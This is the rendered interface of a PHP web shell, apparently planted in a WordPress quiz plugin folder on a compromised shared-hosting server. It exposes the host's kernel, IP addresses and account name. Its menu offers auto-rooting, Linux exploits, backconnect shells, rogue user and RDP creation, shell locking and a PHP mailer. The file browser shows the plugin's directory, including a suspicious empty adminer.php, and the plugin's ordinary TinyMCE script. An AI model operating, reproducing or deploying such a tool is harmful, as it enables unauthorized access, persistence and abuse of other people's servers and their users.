Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
quiz-maker /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
pb_templates
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
quiz
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
59.29
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
ays_quiz_shortcode.js
842
B
-rw-r--r--
index.php
26
B
-rw-r--r--
quiz-maker.php
22.09
KB
-rw-r--r--
uninstall.php
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ays_quiz_shortcode.js
(function() { /* Register the buttons */ tinymce.create('tinymce.plugins.ays_quiz_button_mce', { init : function(ed, url) { /** * Adds HTML tag to selected content */ ed.addButton( 'ays_quiz_button_mce', { title : 'Add Quiz', image : url + '/admin/images/icons/icon-128x128.png', cmd: 'ays_quiz_button_cmd' }); ed.addCommand( 'ays_quiz_button_cmd', function() { ed.windowManager.open( { title : 'Quiz Maker', file : ajaxurl + '?action=gen_ays_quiz_shortcode', }, { plugin_url : url }); }); }, createControl : function(n, cm) { return null; }, }); /* Start the buttons */ tinymce.PluginManager.add( 'ays_quiz_button_mce', tinymce.plugins.ays_quiz_button_mce ); })();
Close